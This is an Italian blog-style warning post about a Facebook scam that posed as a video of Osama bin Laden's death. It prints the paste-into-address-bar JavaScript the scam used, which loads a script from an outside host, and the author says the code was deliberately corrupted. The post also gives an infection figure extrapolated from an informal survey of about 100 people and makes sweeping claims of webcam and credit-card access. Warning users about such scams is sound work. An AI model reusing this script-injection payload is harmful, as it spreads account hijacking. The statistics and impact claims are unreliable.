I numerisi malware che girano per la rete sono oramai noti a tutti, ma di quelli su Facebook, ecco, da un paio di giorni, forse il più diffuso negli ultimi tempi, si è espanso L’ “Osama Binladen Malware”.

Ben 1.345.000 utenti sarebbero incappati nel nuovo malware che si spaccia per il video che mostra la morte del famoso terrorista arabo saudita.

La cifra deriva direttamente da una statistica effettuata a livello personale su un totale di circa 100 utenti nelle giornate di ieri e oggi 5 maggio, il risultato è stato allucinante, personalmente ho ricevuto 6/7 link via chat e in bacheca con un totale di 113 amici circa, mentre altri con piu conoscenti sono arrivati addirittura a 50 LINK!

La media di queste 100 persone tra le loro connessioni e gli amici “infettati” raggiunge il 7%, che, se applicata a tutti gli utenti italiani, da foto sotto quasi 20 milioni, raggiunge la cifra di 1.345.000 utenti infettati!

Ma cosa comporta la condivisione di questo link, e come si fa?

Per vedere il video intitolato semplicementeOsama ecco il video integralebasta seguire le istruzioni, come dice la pagina e incollare un codice javasript nella barra degli indirizzi come ben espresso attraverso degli screen shot, a puro scopo informativo il codice è il sottostante, per prevenirne l’uso scorretto è stato corrotto sia nel codice sia nella foto sottostante raffigurante la pagina:

ojavascript:(i=(x=document).createElement(‘script’)).src=’//strummer5202.inf/you/joe.php?’+Math.random(),b.body.appendChild(a);void(0)

Per arrivare a questa pagina basterebbe semplicemente cliccare su uno dei tanti link che probabilmente sono arrivati anche sulle vostre bacheche o nelle vostre chat che assomigliano o meglio sono questi, anche voi se avete eseguito il procedimento espresso nella foto sovrastante ignorando ogni principio, avrete spedito ai vostri amici via chat e in acheca, senza sapero il link infetto, oltre che alle Mail di coloro che frequentate più spesso, il problema è che dalla mail l’accesso al computer personale sarà molto più facile e diretto, quindi coloro che hanno ideato questo metodo potranno accedere a numerose informazioni come password, nome, cognome, età, carta di credito e per essere indiscreti anche a microfono e web cam se installati nel pc.

naturalmente il consiglio è di non cliccarci per non causare più danni, nel caso voleste invece condividerlo apposta voi questo messaggio è quello che vi potrebbe essere visualizzato,

State attenti mi raccomando e diffidate sempre, meglio prevenire che curare!

Contazrazor